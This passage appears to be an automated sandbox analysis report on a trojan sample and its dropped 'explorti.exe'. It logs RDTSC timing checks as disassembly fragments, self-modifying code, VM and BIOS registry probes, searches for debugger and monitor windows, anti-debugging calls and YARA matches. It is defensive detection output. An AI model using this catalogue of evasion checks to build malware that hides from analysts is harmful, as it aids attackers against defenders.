Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 10199AD second address: 10199D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jl 00007FABC9471C34h 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007FABC9471C26h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019A17 second address: 1019A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FABC90CD756h 0x0000000a popad 0x0000000b pop ebx 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 mov edx, 2F208977h 0x00000016 push 1DD728BDh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007FABC90CD768h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019A4F second address: 1019A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019B78 second address: 1019B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019D44 second address: 1019D4E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FABC9471C2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019D4E second address: 1019D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jbe 00007FABC90CD75Ah 0x0000000d nop 0x0000000e xor si, 11A6h 0x00000013 push 00000000h 0x00000015 mov ecx, dword ptr [ebp+122D2D00h] 0x0000001b mov edi, dword ptr [ebp+122D38B9h] 0x00000021 call 00007FABC90CD759h 0x00000026 pushad 0x00000027 push edi 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019D80 second address: 1019DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jg 00007FABC9471C26h 0x0000000c jbe 00007FABC9471C26h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FABC9471C34h 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019DB2 second address: 1019DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019DB6 second address: 1019DBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019DBA second address: 1019DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FABC90CD760h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019DDB second address: 1019DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019DEC second address: 1019DF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019DF3 second address: 1019E63 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007FABC9471C26h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d mov dword ptr [ebp+122D3901h], esi 0x00000013 push 00000003h 0x00000015 mov ecx, 18BB6F0Ch 0x0000001a pushad 0x0000001b mov dword ptr [ebp+122D1D1Bh], ebx 0x00000021 movzx edx, ax 0x00000024 popad 0x00000025 push 00000000h 0x00000027 jnp 00007FABC9471C2Ch 0x0000002d push 00000003h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007FABC9471C28h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 and edi, dword ptr [ebp+122D2CF4h] 0x0000004f mov edi, dword ptr [ebp+122D2C30h] 0x00000055 push C75AB2FCh 0x0000005a push eax 0x0000005b push edx 0x0000005c push ebx 0x0000005d push edi 0x0000005e pop edi 0x0000005f pop ebx 0x00000060 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019E63 second address: 1019EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 075AB2FCh 0x0000000f jnc 00007FABC90CD75Ch 0x00000015 lea ebx, dword ptr [ebp+1245E895h] 0x0000001b mov edi, dword ptr [ebp+122D3465h] 0x00000021 jmp 00007FABC90CD75Ah 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FABC90CD764h 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019EAB second address: 1019EB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FABC9471C26h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 103A28E second address: 103A29D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push edx 0x00000007 jbe 00007FABC90CD75Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 100BF5F second address: 100BF84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Eh 0x00000007 ja 00007FABC9471C2Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 100BF84 second address: 100BFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FABC90CD764h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 100BFA0 second address: 100BFBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FABC9471C39h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Special instruction interceptor: First address: 96EA2A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Special instruction interceptor: First address: B47B78 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Special instruction interceptor: First address: B30931 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Special instruction interceptor: First address: BA5C30 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: E8EA2A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 1067B78 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 1050931 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 10C5C30 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Code function: 0_2_04E20BA6 rdtsc 0_2_04E20BA6
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 690
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 390
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 653
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 689
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 723
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 3664
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5556 Thread sleep count: 36 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5556 Thread sleep time: -72036s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1160 Thread sleep count: 690 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1160 Thread sleep time: -1380690s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 964 Thread sleep count: 390 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 964 Thread sleep time: -11700000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1840 Thread sleep time: -540000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1548 Thread sleep count: 653 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1548 Thread sleep time: -1306653s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3508 Thread sleep count: 689 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3508 Thread sleep time: -1378689s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3580 Thread sleep count: 723 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3580 Thread sleep time: -1446723s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3508 Thread sleep count: 3664 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3508 Thread sleep time: -7331664s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: explorti.exe, explorti.exe, 00000008.00000002.1972526106.0000000001020000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 00000002.00000003.3388620641.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000002.3856846494.0000000001372000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000003.3071340441.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000002.3856846494.00000000013B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe, 00000000.00000002.1468928029.0000000000B00000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmp, explorti.exe, 00000008.00000002.1972526106.0000000001020000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: explorti.exe, 00000002.00000003.3388620641.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000003.3071340441.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000002.3856846494.00000000013B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW?
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Code function: 0_2_04E20938 Start: 04E20942 End: 04E2094C 0_2_04E20938
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: SIWVID
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Code function: 0_2_04E20BA6 rdtsc 0_2_04E20BA6
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 2_2_00E5645B mov eax, dword ptr fs:[00000030h] 2_2_00E5645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 2_2_00E5A1C2 mov eax, dword ptr fs:[00000030h] 2_2_00E5A1C2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: explorti.exe, explorti.exe, 00000008.00000002.1972526106.0000000001020000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: KProgram Manager
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 2_2_00E3D312 cpuid 2_2_00E3D312
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 2_2_00E3CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 2_2_00E3CB1A

Stealing of Sensitive Information

Source: Yara match File source: 2.2.explorti.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorti.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000003.1931905598.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1468832489.0000000000901000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1972443019.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1428535322.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1474858730.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY